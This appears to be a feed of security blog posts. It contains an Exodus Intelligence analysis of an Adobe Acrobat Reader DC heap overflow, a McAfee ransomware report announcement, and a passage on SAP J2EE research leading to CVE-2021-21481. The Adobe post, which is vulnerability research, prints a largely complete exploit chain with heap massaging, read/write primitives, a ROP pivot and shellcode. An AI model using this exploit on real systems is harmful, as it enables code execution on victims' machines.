099a35f0  0068fffe 00740074 00730070 002f003a
099a3600  0067002f 006f006f 006c0067 002e0065
099a3610  006f0063 002f006d 41414141 41414141
099a3620  41414141 41414141 41414141 41414141
099a3630  41414141 41414141 41414141 41414141

[Truncated]

099a37c0  41414141 41414141 41414141 41414141
099a37d0  41414141 41414141 41414141 41414141
099a37e0  41414141 41414141 41414141 2f2f3a41
099a37f0  00000000 00680074 00730069 006f002e
0:000> du poi(esp+4)
099a35f0  ".https://google.com/䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3630  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3670  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36f0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3730  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3770  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a37b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁㩁."
099a37f0  ""
0:000> dd poi(esp+8)
0b2d30b0  61616262 61616161 61616161 61616161
0b2d30c0  61616161 61616161 61616161 61616161
0b2d30d0  61616161 61616161 61616161 61616161
0b2d30e0  61616161 61616161 61616161 61616161

[Truncated]

0b2d5480  61616161 61616161 61616161 61616161
0b2d5490  61616161 61616161 61616161 61616161
0b2d54a0  61616161 61616161 61616161 00616161
0b2d54b0  4d21fcdc 80000900 41409090 ffff4041
0:000> da poi(esp+8)
0b2d30b0  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30d0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30f0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d3110  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b2d5430  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5450  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5470  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5490  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter is a valid Unicode string. If an anomaly is found the function returns at [2]. The function sub_25802A44 at [3] computes the length of the string provided as a parameter, regardless of its encoding. The function sub_25802CD5 is an implementation of calloc which allocates an array with the amount of elements provided as the first parameter with size specified as the second parameter. The function sub_25802D98 at [4] copies a number of bytes of the string specified in the second parameter to the buffer pointed by the first parameter. Its third parameter specified the number of bytes to be copied. Therefore, at [3] and [4] the length of the base URL is computed, a new allocation of that size plus one is performed, and the base URL string is copied into the new allocation. In an analogous manner, the same operations are performed on the relative URL at [5] and [6].

The function sub_25802400, called at [7], receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [8] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [7]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Continuing with the function previously listed, at [9] the base URL is copied into the memory allocated to host the concatenation and at [10] its length is calculated and provided as a parameter to the call to sub_25818BE0. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [10] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_25818BE0(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[11]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[12]

    sub_2581894C(Destination, Source);
    result = 1;
  }
  else
  {

[13]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [11] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less or equal than the desired concatenation length minus one. If the check passes, the function sub_2581894C is called at [12]. Otherwise the strncat function at [13] is called.

The function sub_2581894C called at [12] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_2581894C(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[14]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[15]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[16]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [14] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [15]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called.

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution.

Adobe Acrobat Reader DC version 2020.013.20074 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

Address Space Layout Randomization (ASLR)
Data Execution Prevention (DEP)
Control Flow Guard (CFG)
Sandbox Bypass

The exploit does not bypass the following protection mechanisms:

Adobe Sandbox protection: Sandbox protection must be disabled in Adobe Reader for this exploit to work. This may be done from Adobe Reader user interface by unchecking the Enable Protected Mode at Startup option found in Preferences -> Security (Enhanced)
Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the *Code Analysis* section of this document.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows to read and write to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

These purpose of these allocations is to have a controllable memory region at the address were the stack is relocated after the execution of the stack pivoting. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page were the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

Obtain pointers to the relevant modules to calculate their base addresses.
Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
Write the shellcode.
Call VirtualProtect to change the shellcode memory region permissions to allow execution.
Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5] the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and checkout our other blog posts!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

McAfee Blogs
McAfee Labs Report Highlights Ransomware ThreatsRaj Samani
24 June 2021 at 04:01

McAfee Labs Report Highlights Ransomware Threats

McAfee Blogs

By: Raj Samani

24 June 2021 at 04:01

The McAfee Advanced Threat Research team today published the McAfee Labs Threats Report: June 2021.

In this edition we introduce additional context into the biggest stories dominating the year thus far including recent ransomware attacks. While the topic itself is not new, there is no question that the threat is now truly mainstream.

This Threats Report provides a deep dive into ransomware, in particular DarkSide, which resulted in an agenda item in talks between U.S. President Biden and Russian President Putin. While we have no intention of detailing the political landscape, we certainly do have to acknowledge that this is a threat disrupting our critical services. Furthermore, adversaries are supported within an environment that make digital investigations challenging with legal barriers that make the gathering of digital evidence almost impossible from certain geographies.

That being said, we can assure the reader that all of the recent campaigns are incorporated into our products, and of course can be tracked within our MVISION Insights preview dashboard.

This dashboard shows that – beyond the headlines – many more countries have experienced such attacks. What it will not show is that victims are paying the ransoms, and criminals are introducing more Ransomware-as-a-Service (RaaS) schemes as a result. With the five-year anniversary of the launch of the No More Ransom initiative now upon us it’s fair to say that we need more global initiatives to help combat this threat.

Q1 2021 Threat Findings

McAfee Labs threat research during the first quarter of 2021 include:

New malware samples averaging 688 new threats per minute
Coin Miner threats surged 117%
New Mirai malware variants drove increase in Internet of Things and Linux threats

Additional Q1 2021 content includes:

McAfee Global Threat Intelligence (GTI) queries and detections
Disclosed Security Incidents by Continent, Country, Industry and Vectors
Top MITRE ATT&CK Techniques APT/Crime

We hope you enjoy this Threats Report. Don’t forget to keep track of the latest campaigns and continuing threat coverage by visiting our McAfee Threat Center. Please stay safe.

The post McAfee Labs Report Highlights Ransomware Threats appeared first on McAfee Blog.

code white | Blog
About the Unsuccessful Quest for a Deserialization Gadget (or: How I found CVE-2021-21481)Kai Ullrich
11 June 2021 at 10:05

About the Unsuccessful Quest for a Deserialization Gadget (or: How I found CVE-2021-21481)

code white | Blog

By: Kai Ullrich

11 June 2021 at 10:05

This blog post describes the research on SAP J2EE Engine 7.50 I did between October 2020 and January 2021. The first part describes how I set off to find a pure SAP deserialization gadget, which would allow to leverage SAP's P4 protocol for exploitation, and how that led me, by sheer coincidence, to an entirely unrelated, yet critical vulnerability, which is outlined in part two.

The reader is assumed to be familiar with Java Deserialization and should have a basic understanding of Remote Method Invocation (RMI) in Java.

Prologue

It was in 2016 when I first started to look into the topic of Java Exploitation, or, more precisely: into exploitation of unsafe deserialization of Java objects. Because of my professional history, it made sense to have a look at an SAP product that was written in Java. Naturally, the P4 protocol of SAP NetWeaver Java caught my attention since it is an RMI-like protocol for remote administration, similar to Oracle WebLogic's T3. In May 2017, I published a blog post about an exploit that was getting RCE by using the Jdk7u21 gadget. At that point, SAP had already provided a fix long ago. Since then, the subject has not left me alone. While there were new deserialization gadgets for Oracle's Java server product almost every month, it surprised me no one ever heard of an SAP deserialization gadget with comparable impact. Even more so, since everybody who knows SAP software knows the vast amount of code they ship with each of their products. It seemed very improbable to me that they would be absolutely immune against the most prominent bug class in the Java world of the past six years. In October 2020 I finally found the time and energy to set off for a new hunt. To my great disappointment, the search was in the end not successful. A gadget that yields RCE similar to the ones from the famous ysoserial project is still not in sight. However in January, I found a completely unprotected RMI call that in the end yielded administrative access to the J2EE Engine. Besides the fact that it can be invoked through P4 it has nothing in common with the deserialization topic. Even though a mere chance find, it is still highly critical and allows to compromise the security of the underlying J2EE server.

The bug was filed as CVE-2021-21481. On march 9th 2021, SAP provided a fix. SAP note 3224022 describes the details.

P4 and JNDI

Listing 1 shows a small program that connects to a SAP J2EE server using P4: The only hint that this code has something to do with a proprietary protocol called P4 is the URL that starts with P4://. Other than that, everything is encapsulated by P4 RMI calls (for those who want to refresh their memory about JNDI). Furthermore, it is not obvious that what is going on behind the scenes has something to do with RMI. However, if you inspect more closely the types of the involved Java objects, you'll find that keysMngr is of type com.sun.proxy.$Proxy (implementing interface KeystoreManagerWrapper) and keysMngr.getKeystore() is a plain vanilla RMI-call. The argument (the name of the keystore to be instantiated) will be serialized and sent to the server which will return a serialized keystore object (in this case it won't because there is no keystore "whatever"). Also not obvious is that the instantiation of the InitialContext requires various RMI calls in the background, for example the instantiation of a RemoteLoginContext object that will allow to process the login with the provided credentials.

Each of these RMI calls would in theory be a sink to send a deserialization gadget to. In the exploit I mentioned above, one of the first calls inside new InitialContext() was used to send the Jdk7u21 gadget (instead of a java.lang.String object, by the way).

Now, since the Jdk7u21 gadget is not available anymore and I was looking for a gadget consisting merely of SAP classes, I had to struggle with a very annoying limitation: The classloader segmentation. SAP J2EE knows various types of software components: interfaces, services, libraries and applications (which can consist of web applications and EJBs). When you deploy a component, you have to declare the dependencies to other components your component relies upon. Usually, web applications depend on 2-3 services and libraries which will have a couple of dependencies to other services and libraries, as well. At the bottom of this dependency chain are the core components.

Now, the limitation I was talking about is the fact that the dependency management greatly affects which classes a component can see: It can precisely see all classes of all components it relies upon (plus of course JDK classes) but not more. If your class ships as part of the keystore service above, it will only be able to resolve classes from components the keystore service declares as dependencies.

Figure 1: dependencies of the keystore service with all child and parent classloaders

This has dramatic consequences for gadget development. Suppose you found a gadget whose classes come from components X, Y and Z but there are no dependencies between these components and in addition, there is no component which depends on all of them. Then, no matter in which classloader context your gadget will be deserialized, at least one of X, Y or Z will be missing in the classpath and the deserialization will end up in a ClassNotFoundException. By using a similar approach to the one described in the GadgetProbe project I found out that at the point the Jdk7u21 gadget was deserialized in the above mentioned exploit, there were only about 160 non-JDK classes visible that implement java.io.Serializable. Not ideal for building an exploit. Going back to listing 1, in case we send a gadget instead of the string "whatever", we can tell from figure 1 that classes from ten components (the ones listed beneath "Direct parent loaders") will be in the class path. Code that sends an arbitrary serializable object instead of the string "whatever" could e.g. look like this (instead of keysMgr.getKeystore()): If there was a gadget, one could send it with out.writeObject().

With this approach, the critical mass of accessible serializable classes can be significantly increased. The telnet interface of SAP J2EE provides useful information about the services and their dependencies.

Regardless of the classloader challenge, I was eager to get an overview of how many serializable classes existed in the server. The number of classes in the core layer, services and libraries amounts to roughly 100,000, and this does not even count application code. I quickly realized that I needed something smarter than the analysis features of Eclipse to handle such volumes. So I developed my own tool which analyses Java bytecode using the OW2 ASM Framwork. It writes object and interface inheritance dependencies, methods, method calls and attributes to a SQLite DB. It turned out that out of the 100,000 classes, about 16,000 implemented java.io.Serializable. The RDBMS approach was pretty handy since it allowed build complex queries like

Give classes which are Serializable and Cloneable which implement private void readObject(java.io.ObjectInputStream) and whose toString() method exists and has more than five calls to distinct other methods

This question translates to

The work on this tool and also the process of constantly inventing new and original queries to find potentially interesting classes was great fun. Unfortunately, it was also in vain. There is a library, which almost allowed to build a wonderful chain from a toString() call to the ubiquitous TemplatesImpl.getOutputProperties(), but the API provided by the library is so very complex and undocumented that, after two months, I gave up in total frustration. There were some more small findings which don't really deserve to be mentioned. However, I'd like to elaborate on one more thing before I'll start part two of the blog post, that covers the real vulnerability.

One of the first interesting classes I discovered performs a JNDI lookup with an attacker controlled URL in private void readObject(java.io.ObjectInputStream). What would have been a direct hit four years ago could at least have been a respectable success in 2020. Remember: Oracle JRE finally switched off remote classloading when resolving LDAP references in 2019 in version JRE 1.8.0_191. Had this been exploitable, it would have opened up an attack avenue at least for systems with outdated JRE. My SAP J2EE was running on top of a JRE version 1.8.0_51 from 2015, so the JNDI injection should have worked, but, to my great surprise, it didn't. The reason can be found in the method getObjectInstance of javax.naming.spi.DirectoryManager: The hightlighted call to getObjectFactoryFromReference is where an attacker needs to get to. The method resolves the JNDI reference using an URLClassLoader and an attacker-supplied codebase. However, as one can easily see, if getObjectFactoryBuilder() returns a non-null object the code returns in either of the two branches of the following if-clause and the call to getObjectFactoryFromReference below is never reached. And that is exactly what happens. SAP J2EE registers an ObjectFactoryBuilder of type com.sap.engine.system.naming.provider.ObjectFactoryBuilderImpl. This class will try to find a factory class based on the factoryName-attribute and completely ignore the codebase-attribute of the JNDI reference. Bottom line is that JNDI injection might never have worked in SAP J2EE, which would eliminate one of the most important attack primitives in the context of Java Deserialization attacks.

CVE-2021-21481

After digressing about how I searched for deserialization gadgets, I'd like to cover the real vulnerability now, which has absolutely nothing to do with Java Deserialization. It is a plain vanilla instance of CWE-749: Exposed Dangerous Method or Function. Let's go back to Listing 1. We can see that the JNDI context allows to query interfaces by name, in our example we were querying the KeyStoreManager interface by the name "keystore". On several occasions, I had already tried to find an available rich client for SAP J2EE Engine administration that uses P4. Every time I was unsuccessful, I believed such a client did not officially exist, or at least was not at everyone's disposal.

